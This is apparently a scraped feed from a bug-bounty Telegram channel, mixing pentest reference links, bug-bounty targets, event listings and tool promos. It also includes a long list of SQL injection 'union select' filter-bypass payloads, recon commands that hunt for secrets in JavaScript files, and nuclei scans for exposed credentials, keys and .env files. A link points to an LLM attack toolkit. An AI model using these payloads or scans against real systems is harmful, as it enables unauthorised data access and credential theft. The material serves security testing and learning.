2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
🔥FRESH BB TARGET - https://visioninstitutecolorado.com/.well-known/security.txt
Читать полностью…
I request a small support in boosting my channel where it help me to be more consistent and more active...
/channel/boost/bugbounty_tech
based on the poll, i have understood is the members of group are looking for AI content too.. thanks for all the responses and i will make plan what content should be add here and what not .
Читать полностью…
↳ Pentest References and CheatSheets
• Hacking Articles
• Hack Tricks
• Cloud Hack Tricks
• Chryzsh Pentest Book
• Total OSCP Guide
• Hack The Box OSCP Preparation
• Steflan Security
• SecWiki
• Hausec
• HighOnCoffee
• six2dez pentest-book
• 0xffsec Handbook
• haax's Cheatsheet
• golinuxcloud
• Pentest Monkey
• Web App Testing Guide
• XSS CheatSheet
• Payload Box
• Steganography Tools
• Metasploit Unleashed
• Payloads All The Things
• Mobile Security Testing Guide
• WADComs
• LOLBAS
• explainshell
#infosec #cybersecurity #bugbounty #pentest #cheatsheet
A library of tools for vibe coding
https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools
https://zhero-web-sec.github.io/writeups/
https://samcurry.net/
https://shubs.io/
https://dhiyaneshgeek.github.io/
https://bhavukjain.com/
https://rhynorater.github.io/
https://m0chan.github.io/
https://spaceraccoon.dev/
https://ott3rly.com/
https://www.jhaddix.com/blog
https://hackerrishad.me/
/channel/ChatGPT_General_Bot?start=_tgr_jAjHdy84OTAx
Читать полностью…
BB Target - https://cybozu.co.jp/en/company/products/bug-bounty/
Читать полностью…
Hey Hunter's,
DarkShadow here back again, just dropping a list of queries.
30K+ Search Queries 🚀
(Google | Shodan | FOFA)
For hunters, red teamers & OSINT warriors:
⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision
GitHub →https://github.com/projectdiscovery/awesome-search-queries
Show your love Guy's ❤️
#bugbountytips #osint
Find sensitive information with gf# Search for testing point with gau and fff
gau target -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/
# After we save responses from known URLs, it's time to dig for secrets
for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done
𝗠𝗖𝗣 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗥𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀
🔗 Awesome MCP Security:
https://github.com/Puliczek/awesome-mcp-security
🔗 Defensive Guide :
https://www.infracloud.io/blogs/securing-mcp-servers/
🔗 MCP Tool :
https://github.com/eqtylab/mcp-guardian
🔗 MCP Threat Modeling :
https://www.csoonline.com/article/4023795/top-10-mcp-vulnerabilities.html
🔗 MCP Security Research :
https://arxiv.org/pdf/2507.06250
🔗 MCP Security Article :
https://www.darkreading.com/application-security/agentic-ai-risky-mcp-backbone-attack-vectors
🔗 MCP Security 101 Guide :
https://www.redhat.com/en/blog/model-context-protocol-mcp-understanding-security-risks-and-controls
🔗 MCP Top Vulnerability :
https://cymulate.com/blog/cve-2025-53109-53110-escaperoute-anthropic/
🔗 MCP Security Video :
https://m.youtube.com/watch?v=zj29lslZxFg
@acesclan #mcp #agentic #ai
#info #Events #Cyber_Education
Cybersecurity Events Sep. - Dec. 2025:
1. Cyber-AI 2025 (Sep. 1-4)
2. Nullcon Berlin (Sep. 3-5)
3. Blue Team Con (Sep. 4-7)
4. SECCON 2025 (Sep. 9)
5. 44CON (Sep. 18-19)
6. National Cyber Summit (Sep. 23-25)
7. HackAICon 2025 (Sep. 25)
8. ESORICS 2025 (Sep. 22-26)
9. BruCON 2025 (Sep. 25-26)
10. COSAC 2025 (Sep.28 - Oct.2)
11. Black Hat AI Summit at SecTor (Sep.30 - Oct.2)
12. Hexacon 2025 (Oct. 4-5)
13. Offensive AI Con 2025 (Oct. 5-8)
14. c0c0n 2025 (Oct. 7-11)
15. Black Hat Fall Online Trainings (Oct. 20-23)
16. OWASP LASCON 2025 (Oct. 21-22)
17. IEEE ISSRE 2025 (Oct. 21-24)
18. DevSecCon 2025 (Oct. 22)
19. SAINTCON 2025 (Oct. 21-24)
20. IAPP Privacy.Security.Risk (Oct. 28-31)
21. OSINTCon 2025 (Nov. 1-2)
22. SANS Fall Cyber Solutions Fest - AI Track (Nov. 6)
23. DEATHCon (Nov. 8-9)
24. POC2025 Hacking Conference (Nov. 13-14)
25. SURICON 2025 (Nov. 19-21)
26. Black Hat Middle East & Africa (Dec. 2-4)
27. Black Hat Europe 2025 (Dec. 8-11)
28. Annual Computer Security Applications Conference (ACSAC2025) (Dec. 8-12)
29. BSidesTLV 2025 (Dec. 11)
30. SANS Cyber Defense Initiative (Dec. 12-17)
🔥BB TARGET - https://www.lockheedmartin.com/en-us/contact/vulnerability-disclosure-policy.html
Читать полностью…
Johnermac
>eJPT
>eCPPTv2
>PNPT
>eWPTXv2
>Active Directory Exploitation
>CRTP
>CRTE
>CLOUD
>CONTAINER
Link 🔗:-
https://johnermac.github.io/
#Tech_book
#Sec_code_review
"Node.js Secure Coding:
Defending Against Command Injection Vulnerabilities",
July 2023.
// Learn about secure coding practices with Node.js based on realworld CVE vulnerabilities in popular open-source npm packages: 12 Vulnerable npm Packages, 33 Self-assessment Questions, 10 Chapters
Automating API Vulnerability Testing Using Postman Workflows
https://haymiz.dev//security/2024/04/27/automating-apis-with-postman-workflows/
⚡Sn1per - Automate your recon like never before!
✅ https://github.com/1N3/Sn1per
Bypass SQL union select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
Active Directory Pentesting
https://exploit-notes.hdks.org/exploit/windows/active-directory/
🔥 Find Low Hanging Fruits Using Nuclei AI 🔥nuclei -list targets.txt -ai "Find exposed AI/ML model files (.pkl, .h5, .pt) that may leak proprietary algorithms or sensitive training data"
nuclei -list targets.txt -ai "Find exposed automation scripts (.sh, .ps1, .bat) revealing internal tooling or credentials"
nuclei -list targets.txt -ai "Identify misconfigured CSP headers allowing 'unsafe-inline' or wildcard sources"
nuclei -list targets.txt -ai "Detect pages leaking JWT tokens in URLs or cookies"
nuclei -list targets.txt -ai "Identify overly verbose error messages revealing framework or library details"
nuclei -list targets.txt -ai "Find application endpoints with verbose stack traces or source code exposure"
nuclei -list targets.txt -ai "Find sensitive information in HTML comments (debug notes, API keys, credentials)"
nuclei -list targets.txt -ai "Find exposed .env files leaking credentials, API keys, and database passwords"
nuclei -list targets.txt -ai "Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."
nuclei -list targets.txt -ai "Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."
nuclei -list targets.txt -ai "Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."
nuclei -list targets.txt -ai "Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."
nuclei -list targets.txt -ai "Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."
nuclei -list targets.txt -ai "Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."
nuclei -list targets.txt -ai "Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"
nuclei -list targets.txt -ai "Identify open directory listings exposing sensitive files"
nuclei -list targets.txt -ai "Find exposed .git directories allowing full repo download"
nuclei -list targets.txt -ai "Find exposed .svn and .hg repositories leaking source code"
nuclei -list targets.txt -ai "Identify open FTP servers allowing anonymous access"
nuclei -list targets.txt -ai "Find GraphQL endpoints with introspection enabled"
nuclei -list targets.txt -ai "Identify exposed .well-known directories revealing sensitive data"
nuclei -list targets.txt -ai "Find publicly accessible phpinfo() pages leaking environment details"
nuclei -list targets.txt -ai "Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"
nuclei -list targets.txt -ai "Identify exposed .vscode and .idea directories leaking developer configs"
nuclei -list targets.txt -ai "Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"
nuclei -list targets.txt -ai "Find exposed WordPress debug.log files leaking credentials and error messages"
nuclei -list targets.txt -ai "Detect misconfigured CORS allowing wildcard origins ('*')"
nuclei -list targets.txt -ai "Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"
nuclei -list targets.txt -ai "Find exposed admin panels with default credentials"
nuclei -list targets.txt -ai "Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."
nuclei -list targets.txt -ai "Detect web applications running in debug mode, potentially exposing sensitive system information."
⚡Automated red-team toolkit for stress-testing LLM defences - Vector Attacks on LLMs
✅https://github.com/MrMoshkovitz/gandalf-llm-pentester
Google 🔍 Engineer dropped a book. A comprehensive guide to building agentic AI systems.
Key points:Concepts: Prompt chaining, routing, memory, planning, safety, and evaluation.
✅Patterns: Design methods for multi-agent setups, tool-using agents, and autonomous workflows.
✅Hands-on: Code samples for implementing these patterns in real-world apps.
✅Goal: Help developers build reliable, scalable, and safe intelligent agents.
Think of it as a playbook for advanced AI agent design.
#Tech_book
"Advanced Python for Cybersecurity:
Techniques in Malware Analysis, Exploit Development, and Custom Tool Creation", 2024.
// By integrating Python into your cybersecurity arsenal, you can automate repetitive tasks, enhance your analytical capabilities, forge custom tools tailored to specific threats, and ultimately fortify your defenses against an ever-evolving adversary